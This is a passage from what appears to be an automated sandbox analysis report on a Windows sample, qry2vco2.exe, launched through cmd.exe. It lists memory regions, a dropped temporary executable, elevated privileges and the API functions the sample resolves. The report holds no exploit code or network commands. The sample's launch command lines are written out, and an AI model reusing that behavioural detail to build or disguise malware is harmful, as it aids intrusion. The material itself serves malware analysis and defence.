| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #172: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #172 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:09, Reason: Child Process |
| Unmonitor | End Time: 00:03:11, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2c0 |
| Parent PID | 0xc54 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FB8
0x
9F8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x002edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x01daffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:42 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #173: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #173 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "ImagingDevices.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:09, Reason: Child Process |
| Unmonitor | End Time: 00:03:16, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x208 |
| Parent PID | 0x614 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B3C
0x
BA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000eb0000 | 0x00eb0000 | 0x04eaffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004eb0000 | 0x04eb0000 | 0x04ebffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04ec3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04ed1fff | Private Memory | rw |
|
|
|
